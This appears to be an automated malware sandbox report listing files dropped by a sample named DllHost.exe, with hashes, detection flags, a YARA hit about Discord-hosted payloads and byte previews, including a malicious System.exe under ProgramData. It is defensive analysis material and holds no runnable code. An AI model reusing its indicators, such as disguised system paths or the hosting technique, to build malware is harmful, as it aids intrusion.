                                                                                                                                                            SSDEEP:12288:5TrbdUJPfcw827BePye4sa4D0/EEqAoaq79Troe:53C5Vjdw4snD0/E7Aoa2Tr
                                                                                                                                                            MD5:6368031626DA1F0D51BCAC43104B123F
                                                                                                                                                            SHA1:5A340A1A3EDC0BF03526E677A0415FFD156C139C
                                                                                                                                                            SHA-256:11004AFF3EE4083623A7E01CB06438E1B8879E2D00CF2350C26FB1003125577D
                                                                                                                                                            SHA-512:442B04DC415858E61555B0F026C6EBB76FCAD22F9317736766BB793DBCC22FC014DDB1973FEAFF05298905BF2E97036AA64AE96FA9CC9884D50015D17FBAC465
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\ProgramData\MicrosoftNetwork\System.exe, Author: Florian Roth
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .[.A...A...A...'...A...'..pA....)..A...4...A...4...A...4...A..z4...A..z4...A...'...A...'...A...'...A...A..aA...4...A...4+..A...4...A..Rich.A..........PE..d......b.........."......~...x.......(.........@.............................0............`..................................................{..................D:........... ..........8...........................0...8............................................text....}.......~.................. ..`.rdata..............................@..@.data................~..............@....pdata..D:.......<..................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\MicrosoftNetwork\System.exe:Zone.Identifier

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26
                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.3593198815979092
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                                            MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                                            SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                                            SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                                            SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:MPEG-4 LOAS
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                            Entropy (8bit):0.24942486535614883
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4A:BJiRdwfu2SRU4A
                                                                                                                                                            MD5:5CACBBC91BE7AB1E25AA03D2334E43AE
                                                                                                                                                            SHA1:A452D4866DB0AF9705996A324FC94EE33F894DB7
                                                                                                                                                            SHA-256:1FC2AECFF66C6C8C348EB75527BD842C7A261495DA4B822D6E57B75D23B7995A
                                                                                                                                                            SHA-512:5BE7C604891A4EA7537EF74DE636C6612E7D66AF7DD3C83C483FB97F2DDC37BC6D5A05BDD6D9420CB26BE2FBCE83501DB474B242C1259AA040FEF0ABFD77F3C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x31fbad4b, page size 16384, Windows version 10.0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):786432
                                                                                                                                                            Entropy (8bit):0.25060129345753296
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:Xfs+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:XfzSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                            MD5:E057974092089B9BB18EC2AAD34F3F61
                                                                                                                                                            SHA1:9CFBD82FB186A2B3955EBCDB87A8B7CE4E97E444
                                                                                                                                                            SHA-256:B70BEEC72982C92ECF56E4BA5864936DAE4386437C561C7D14D385BCBCF21765
                                                                                                                                                            SHA-512:EAD7977EB63F47371C3569690FBEFEFF567FE5304919F431640724992BD0F372FBDC79717E9EA7F46AD54D0112204C972C8F84EAE73A4A25DF53C59D103F372C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:1..K... ................e.f.3...w........................).....,6...z;.!3...zE.h.(.....,6...z;...)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................,6...z;.....................,6...z;.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16384
                                                                                                                                                            Entropy (8bit):0.07558813210913348
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:hVT7vEWB8CU2Xlyii2gwEOxMJXlall3Vkttlmlnl:PTrEWGsQvpO0A3
                                                                                                                                                            MD5:3F873B0B0C221A0729D5932A150F315C
                                                                                                                                                            SHA1:BB0DF336BA59971DEFC452A28502D25C36840A7B
                                                                                                                                                            SHA-256:48F5C4D5AADE618E7725B2B1B04D927B664A8AF823BEA30682B0C859D8545CAF
                                                                                                                                                            SHA-512:B606AF297D48ADCA8A686D473E9363D831B55F1F1DF12C6248190FC8E173472399A1F43AE3EA0EF6B7536A7A7E90F4338C00CD9C5F1C6EAF95A6EBC34425A208
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:P........................................3...w..!3...z..,6...z;.........,6...z;.,6...z;./.$.+6...z......................,6...z;.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DllHost.exe_609196b4cb285edcdff317a820b15ebe8f3446_10fdc159_1142a983\Report.wer

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):65536
                                                                                                                                                            Entropy (8bit):1.0969341305057216
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:BIFClixS8Zhpb7c8SKpXIQcQMc6jcEacw3nq+HbHg/8BRTf3uF0GWAfivSEkTnEl:KKiEkHSnArzjCjD8m/u7s9S274ltD
                                                                                                                                                            MD5:5A140BDCEF6F929133F4679714ABE0C0
                                                                                                                                                            SHA1:96F71896F033F60BD984D57236444A17C77AED7E
                                                                                                                                                            SHA-256:D456DF686BEDC3B0CAB812A49C233E70044FC62DA44C2F1DB720454331243CB6
                                                                                                                                                            SHA-512:957931D8FA8ED82C825D742C5F1E1D2C598234632639437721D886FCB35D3C613213C20AD1CF7F41CA153DE96BE41B27A9C1CA45990AF6B31623DD5818D9FD5C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.6.5.3.9.2.2.5.6.2.6.3.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.6.5.3.9.3.8.1.5.6.3.1.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.7.9.c.6.0.5.-.1.e.b.a.-.4.d.0.2.-.a.b.1.7.-.e.2.6.a.a.2.b.f.f.c.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.4.e.a.6.1.0.-.0.0.1.4.-.4.0.1.b.-.9.7.c.e.-.9.8.0.7.0.a.3.3.3.d.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.l.l.H.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.0.-.0.0.0.1.-.0.0.1.c.-.a.d.b.1.-.7.a.4.f.d.6.9.1.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.8.f.e.e.1.0.b.7.a.0.3.b.b.2.e.9.1.9.f.d.d.e.7.b.9.8.9.b.7.6.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.a.3.4.0.a.1.a.3.e.d.c.0.b.f.0.3.5.2.6.e.6.7.7.a.0.4.1.5.f.f.d.1.5.6.c.1.3.9.c.!.D.l.l.H.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.7././.0.6.:.1.6.:.1.2.:.4.9.

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_System.exe_eda1eb74c7e276505ffcc173c4c6562baff4e0aa_fd04c102_1ab6f0ad\Report.wer

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):65536
                                                                                                                                                            Entropy (8bit):1.0840387675419496
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:g18Fd4+iXImInhpIl7c8SKpXIQcQ4c6KcEscw3E+p+HbHg/8BRTf3uF0GWAfivSh:TVmHWOWsjCj6rKz/u7s9S274lt0
                                                                                                                                                            MD5:3CFD08CA3BB7A430E0A400C2C428AF2C
                                                                                                                                                            SHA1:DAA4E1583F7D7EB9F32A6D2CE61B644C28103D8B
                                                                                                                                                            SHA-256:806F9DE82BF86F4F204A4860014DA90BB0173E2000D69D604F0FB59DA53B4DBE
                                                                                                                                                            SHA-512:C3E44D7F5897A5284CB843096B1F1BBAF244C6E444F05A1A3EAE92AA62E1C8396E1646FADBAC7239CF7E3C71FF1E4F89F46FF538369EE813F01F231BD8BD0126
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.6.5.3.9.1.4.5.4.5.1.0.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.6.5.3.9.2.6.0.4.5.1.2.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.1.5.c.7.4.a.-.9.b.a.6.-.4.5.3.0.-.8.c.7.2.-.6.0.0.3.f.d.c.6.f.a.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.c.5.7.7.5.6.-.4.8.1.1.-.4.e.b.4.-.8.a.8.4.-.6.9.c.6.b.d.5.e.f.1.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.y.s.t.e.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.8.-.0.0.0.1.-.0.0.1.c.-.1.8.5.a.-.0.8.5.a.d.6.9.1.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.S.y.s.t.e.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.7././.0.6.:.1.6.:.1.2.:.4.9.!.0.

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER427C.tmp.dmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Jul 7 07:52:00 2022, 0x1205a4 type
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):213422
                                                                                                                                                            Entropy (8bit):1.514866947490535
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:99Uun7CteuaPzSNwP1AeOjtAmvPv9xf/PDUl+KDuxKqnRS5t9K:9XBFOjtAmvPvv/PKDuxKqnRS1K
                                                                                                                                                            MD5:6B50CE059938F45A0624FADABEF012C0
                                                                                                                                                            SHA1:E488AE9AFEDCCC45804FE731499F6ECB8605920E
                                                                                                                                                            SHA-256:D059B99E80004A34CFADC21E265B5CB6EACF2442E4BAD3F44159ABC316D387D1
                                                                                                                                                            SHA-512:070EF68761A8E57DA8DD8E16A3CFD3AD435E472E8C76BE8BF0C9382BA931D066E0243262E91C279903AE0F75FD4EAAFB9CE32F1C3A35501E618818B75D50F04A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MDMP....... ..........b............t.......................$....'......T....u..........`.......8...........T...........0S..~...........8'..........$)...................................................................U...........B.......)......Lw................:.3...T...........z..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6007.tmp.WERInternalMetadata.xml

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8796
                                                                                                                                                            Entropy (8bit):3.698070336769564
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiDVL06Y4CvY38QOgmfzS2+pD189bKA5f4Om:RrlsNixA6YNvY38hgmfzSAKefo
                                                                                                                                                            MD5:26D5C80CA4B5D997F4019343067164DC
                                                                                                                                                            SHA1:B1A0A0918B22939B506DDF285EDE09695C640432
                                                                                                                                                            SHA-256:F07EFDFF5628253EC8F0920B63F8864E3594A6FC1AC07B1E9201781224EA6FBB
                                                                                                                                                            SHA-512:A885CACC1D06B75DC60B896DD678698DE5321FD25AABAF7C386D8B135D7F36EECDF95846DD726987EC752419D79B0FE75AD0B27B42F1F4C0556D97517543F3B7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.1.6.<./.P.i.d.>.......

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER61DB.tmp.dmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Jul 7 07:52:08 2022, 0x1205a4 type
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):217698
                                                                                                                                                            Entropy (8bit):1.5883100711456626
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:qieJnn7/pv9S8gzNNeYyofQbEsuODgRsSKUx9fCZTJwhPb4cPr5N:jCIBfgEsu3RsSKBFJobrPb
                                                                                                                                                            MD5:A36E674040B643E0FDA42EF6443EDD97
                                                                                                                                                            SHA1:51D82F50D4B1122B57E69EBA6DA274ABA4FF1FFF
                                                                                                                                                            SHA-256:13601772285EBCAA69653077E5D929EB2F8C8320008361FEF8760DFB483C0FB6
                                                                                                                                                            SHA-512:36427B4CC7FE9E388F5D635CCEBE66E4FAD0426C1C5DD701767FE74EF5AF9D1CBD2E001FB8BCA0471C470C62D2A82CF344BC96FCCBDCB05F1188D601B7A690AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:MDMP....... ..........b............t.......................T...X(......$....w..........`.......8...........T............b...............(...........*...................................................................U...........B......0+......Lw................o\....T...........h..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6354.tmp.xml

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4712
                                                                                                                                                            Entropy (8bit):4.420848847332227
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:cvIwSD8zsm+JgtBI92oWgc8sqYjA8fm8M4JobFSdsyq8vY6KcQIcQQw03d:uITfxkBgrsqYRJVdsWfKkQ33d
                                                                                                                                                            MD5:4DEFF959CDE4C4A7617693387D76E7B8
                                                                                                                                                            SHA1:E1D0A82760FA8FA20A2E73B5D6D9DA1415A5238E
                                                                                                                                                            SHA-256:8BF19F508B6189AFF0A35840E46F3AB79C0BBE364C610D4829D4F252FB051DDB
                                                                                                                                                            SHA-512:F0BD84F9528FF4D7FD8E916BA9225EE2144A800115A4B37C57C939667657EFBF4A24FC6B8CF2A2B6A3031195D633F5919675CCEE036B31611A07D0C2F0FBF3E9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1592222" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6507.tmp.csv

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):62874
                                                                                                                                                            Entropy (8bit):3.0537738924354607
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:UXHQmtXReWK5A+/gFEF5Ux6bweMQ5JhAn6sfLlXu4B:UXHQmtXReWK5A+/gFEF5UxoweMQ5JhAn
                                                                                                                                                            MD5:37F0CADFE5B6EFDBD98EFA5E7878D75A
                                                                                                                                                            SHA1:84AC4E7619D9762114365E00347F971F6BD33675
                                                                                                                                                            SHA-256:96D75696966C2B35265119C753EE3D127C6F7857F04C16B75949B9E85C5D165D
                                                                                                                                                            SHA-512:4810FC908C568778E8B301B96C1F46977332AA847C79ADD5FD0FC66801322D04888D78C7D24D61E8B4C5E09616E535A41AD93F1CFC784FCE22E576DED13126DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BB0.tmp.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13340
                                                                                                                                                            Entropy (8bit):2.700228353740265
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kiZYWOkV433YdY+WpEfHkYEZS+toiS9YfmwsrN76zZarCxbRJI4T3:hZDo3KPvXNiZarCxbR24T3
                                                                                                                                                            MD5:5C8F853CAC2BFB5782B16D3346C6214A
                                                                                                                                                            SHA1:98C04E5F8D4A7218E6F5F1700F6DBAC12BA18D4E
                                                                                                                                                            SHA-256:7E68DDBBAEA65E30F4DAEC00BE1420563B182FED73199870DBA7837FE5080B37
                                                                                                                                                            SHA-512:CF7465CE350EB1CCB6E02FF45038EC299306964953732D140BD9E54AD6EAC580270458F58172D4E5AE8A901CA11D3ECCBDCEE9A18CE8B5979674872E68E6917F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.2.6.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER836E.tmp.WERInternalMetadata.xml

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8840
                                                                                                                                                            Entropy (8bit):3.6996927924595253
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:Rrl7r3GLNiN6V/6Y4263S3gmfDStG+pDu89bAdAfnvgm:RrlsNiwd6YZ63S3gmfDStVA6f9
                                                                                                                                                            MD5:E03C9554DE1E7D3F028AF1C7A4C0C15A
                                                                                                                                                            SHA1:7A11DC91871E916FB4B4D4D3653E451BEACAAC53
